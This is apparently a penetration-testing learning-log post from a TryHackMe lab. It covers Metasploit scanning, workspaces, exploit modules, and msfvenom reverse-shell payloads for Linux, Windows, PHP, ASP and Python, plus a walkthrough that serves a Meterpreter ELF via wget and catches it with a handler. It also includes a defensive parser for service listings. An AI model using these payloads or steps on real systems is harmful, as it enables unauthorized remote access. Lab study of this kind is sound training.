Today we are going to learn how to use Metasploit for vulnerability scanning and exploitation.
Let’s start our daily #FromZeroToHacker challenge.
Table of contents
- Introduction
- What have I learnt today?
- Stats
- Resources
Introduction to Metasploit Exploitation
Today we are going to learn how to use Metasploit for vulnerability scanning and exploitation. We will also cover how the database feature makes it easier to manage penetration testing engagements with a broad scope. Finally, we will generate payloads with msfvenom and start a Meterpreter session on most target platforms.
What have I learnt today?
Scanning
Port scanning
We can list all the modules that scan open ports using the `search portscan` command.
We can load one module using `use <NUMBER>`, as we saw in yesterday’s lesson, and make Metasploit list all the options available.
We need to set up values for 7 options! Luckily, most of them have a default value.
But we can also run `nmap` from Metasploit.
UDP service identification
The scanner module `scanner/discovery/udp_sweep` will allow you to quickly identify services running over UDP (User Datagram Protocol). While it doesn’t run an extensive scan of all possible UDP services, it provides a quick way to identify services such as DNS or NetBIOS.
SMB Scans
Metasploit also offers auxiliary modules that allow us to scan specific services, for example SMB (Server Message Block, from Windows). Let’s see an example of `scanner/smb/smb_version`.
We shouldn’t omit exotic services such as NetBIOS (Network Basic Input Output System), as it allows computers to communicate with each other over the network, to share or send files to printers. For example, the NetBIOS name could reveal important information such as the role of the computer (DEV-OPS, SALES, CEO). We can also find shared files and folders that could be accessed either without a password or protected with a simple password (admin, administrator, 1234…).
Metasploit has many modules that can help us have a better understanding of the target system: It is always worth performing a quick search to see if we can find extra information.
The Metasploit Database
Metasploit has a database function to simplify project management and avoid possible confusion when setting up parameter values. First, we need to start a PostgreSQL database with `systemctl start postgresql`. Then, we initialise the Metasploit database with `msfdb init`.
Then, launch `msfconsole` and check the database status with `db_status`.
Now, we can create different workspaces to isolate different projects. We should be in the default workspace:
Add a new workspace with `workspace -a <NAME>` or delete an existing one with `workspace -d <NAME>`.
We can navigate between workspaces with `workspace <WORKSPACE_NAME>`.
You can use `workspace -h` to list all the options available.
If we run a module, for example `db_nmap`, all results will be saved to the database.
We can now reach the information relevant to hosts and services with the `hosts` and `services` commands.
Example workflow
- We will use the vulnerability scanning module that finds potential MS17-010 vulnerabilities with the `use auxiliary/scanner/smb/smb_ms17_010` command.
- Set the RHOSTS value using `hosts -R`.
- Check if all values are assigned correctly with `show options`.
- Launch the module with `exploit` or `run`.
You may want to look for classic vulnerabilities in:
- HTTP: Could potentially host a web application where you can find SQL vulnerabilities or RCE.
- FTP: Could allow anonymous login.
- SMB: It may be vulnerable to SMB exploits like MS17-010.
- SSH: Could have default or easy-to-guess credentials.
- RDP: It may be vulnerable to Bluekeep or allow desktop access if weak credentials are used.
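The `services` table that the Metasploit database prints (see the `hosts` and `services` commands above) is plain text, so it can be parsed and checked against the classic-vulnerability list just given. The following is an added example, not code from the original post or from Metasploit: it parses a constructed `services` listing (hypothetical hosts) and produces a per-host review list of what to verify or patch for each exposed service.

```python
import re
from dataclasses import dataclass

# Constructed sample of the text table that msfconsole's `services` command
# prints for a workspace. Hosts and banners are hypothetical.
SAMPLE_SERVICES = """\
Services
========

host       port  proto  name           state  info
----       ----  -----  ----           -----  ----
10.10.1.5  21    tcp    ftp            open   vsftpd 3.0.3
10.10.1.5  22    tcp    ssh            open   OpenSSH 7.6p1
10.10.1.5  80    tcp    http           open   Apache httpd 2.4.29
10.10.1.9  445   tcp    microsoft-ds   open   Windows 7 Professional SP1
10.10.1.9  3389  tcp    ms-wbt-server  open
10.10.1.9  5900  tcp    vnc            open   VNC (protocol 3.8)
"""

# The post's checklist, keyed by the service name as Nmap/Metasploit report it,
# phrased as the hardening question each exposed service raises.
REVIEW_HINTS = {
    "ftp": "FTP: verify anonymous login is disabled",
    "http": "HTTP: review the web app for SQL injection / RCE exposure",
    "microsoft-ds": "SMB: confirm MS17-010 patch level and disable SMBv1",
    "netbios-ssn": "SMB: confirm MS17-010 patch level and disable SMBv1",
    "ssh": "SSH: remove default credentials, prefer key authentication",
    "ms-wbt-server": "RDP: confirm BlueKeep patch level, enforce strong credentials",
    "vnc": "VNC: check for missing or weak password",
}

@dataclass
class Service:
    host: str
    port: int
    proto: str
    name: str
    state: str
    info: str

def parse_services(text: str) -> list[Service]:
    """Turn the `services` text table into Service records (title/header skipped)."""
    rows = []
    for line in text.splitlines():
        # Data rows start with an IPv4 address; the info column may be empty.
        m = re.match(r"^(\d+\.\d+\.\d+\.\d+)\s+(\d+)\s+(\w+)\s+(\S+)\s+(\w+)\s*(.*)$", line)
        if m:
            host, port, proto, name, state, info = m.groups()
            rows.append(Service(host, int(port), proto, name, state, info.strip()))
    return rows

def review_exposure(services: list[Service]) -> dict[str, list[str]]:
    """Map each host to the review items triggered by its open services."""
    report: dict[str, list[str]] = {}
    for s in services:
        hint = REVIEW_HINTS.get(s.name)
        if s.state == "open" and hint:
            report.setdefault(s.host, []).append(f"{s.port}/{s.proto} {hint}")
    return report
```

Running `review_exposure(parse_services(SAMPLE_SERVICES))` gives three review items for each of the two sample hosts; the same parser works on the real `services` output because only the leading IP column is used to recognise a data row.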
Vulnerability scanning
Metasploit allows you to identify easy critical vulnerabilities or low-hanging fruit. For example, if we identify a VNC service, we may use `search vnc` in Metasploit to list useful modules.
We can use `info` in any module to get more information about how it works, how to use it, its purpose, etc.
Exploitation
Exploits are the most populated module category. Not a surprise, since Metasploit is an exploitation framework.
We have used `search` to search for exploits, `info` to dump more information about the exploit, and finally we launched it with `exploit` or `run`.
This process seems simple, but a successful outcome depends on a great understanding of the services running on the target system.
Most exploits have a preset default payload; we can list the compatible ones with `show payloads`.
Once we have decided on the payload, we can select it with `set payload <NUMBER>`:
![[day_055_set_payload.png]]
Remember that finding a working payload can become a trial-and-error process due to firewalls, anti-virus, configurations, etc.
Some payloads will open new parameters that we need to set; running `show options` will display them.
Let’s `run` the exploit. This will create a session. This session can be backgrounded using CTRL+Z or aborted with CTRL+C.
Backgrounding a session will be useful when working on more than one target at the same time, or using the same target but with a different exploit.
Working with sessions
The `sessions` command will list all the active sessions (like the one we just backgrounded). `sessions -i <NUMBER>` will foreground the selected session.
Msfvenom
Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads. Msfvenom will allow you to create payloads in many different formats (.php, .exe, .dll, .elf, etc) and for many different target systems (Linux, Windows, Android, etc).
Output formats
We can generate either stand-alone payloads (executables for Meterpreter) or a usable raw format (python, php…). The `msfvenom --list formats` command can be used to list supported output formats.
Encoders
As the name says, this encodes the payload. Despite some beliefs, this is not used to bypass antivirus, as there are better options for that.
Handlers
When we deliver a Msfvenom payload on our own, we also need to be able to accept the incoming connection it generates, for example a reverse shell. When using an exploit module this is handled automatically by the module; reverse shells or Meterpreter callbacks generated by a stand-alone Msfvenom payload are instead caught using a handler.
Imagine that we want to exploit a file upload vulnerability present in DVWA (Damn Vulnerable Web Application). The exploit steps are:
- Generate the PHP shell using Msfvenom.
- Start the Metasploit handler.
- Execute the PHP shell.
Msfvenom requires a payload, the local machine IP address, and the local port that will be used as a listener:
Warning: The output PHP file is missing the opening PHP tag. The file should be edited to turn it into a working PHP file.
With the reverse shell code created, we can use the multi handler to receive the incoming connection with `use exploit/multi/handler`.
Now, we just need to `run` the handler and wait for the incoming connection.
Other payloads
Depending on the target configuration (OS, webserver, etc) msfvenom can be used to create payloads in almost all formats.
In all these examples, LHOST is the IP of our own machine (where the handler listens, as in the previous step), and LPORT is the port where our handler will listen.
- Linux Executable and Linkable Format (.elf): `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f elf > <FILENAME>.elf`. The .elf format is executable for Linux. Remember to use `chmod +x <FILENAME>.elf` to give it executable permissions, then `./<FILENAME>.elf` to run the code.
- Windows: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f exe > rev_shell.exe`
- PHP: `msfvenom -p php/meterpreter_reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f raw > <FILENAME>.php`
- ASP: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f asp > <FILENAME>.asp`
- Python: `msfvenom -p cmd/unix/reverse_python LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f raw > <FILENAME>.py`
All of these examples are reverse payloads, meaning that we will need to have the exploit/multi/handler module listening on our attacking machine. Remember to set up the payload, LHOST and LPORT parameters.
This is an example of an attack using msfvenom:
First, we create a meterpreter payload in the .elf format and we give it permissions:
Then, we start a Python web server to serve the file to the target computer once we are inside:
Then, we login inside the target computer with SSH:
Once we are inside, get permission to download the file and download it with `wget`.
The file is transferred. Stop the python3 server and instead start msfconsole, `use exploit/multi/handler`, configure it with the payload, IP and port values we used when creating the payload in the first step, then run it to create a listener.
Now, give permissions to the downloaded .elf file and run it; msfconsole will get a Meterpreter session. The hack has been successful 🙂
Summary
Things we learned today:
- How to scan target systems using Metasploit.
- How to use the Metasploit database feature.
- How to use Metasploit to conduct a vulnerability scan.
- How to use Metasploit to exploit vulnerable services on target systems.
- How `msfvenom` can be used to create payloads and obtain a Meterpreter session on the target system.
Stats
From 77.283th to 76.355th.
Here is also the Skill Matrix:
Resources
Path: Jr Penetration tester
Metasploit
TryHackMe: Metasploit Exploitation
Other resources
Metasploit: Introduction
SQL Injection attacks
What the Shell? Part 2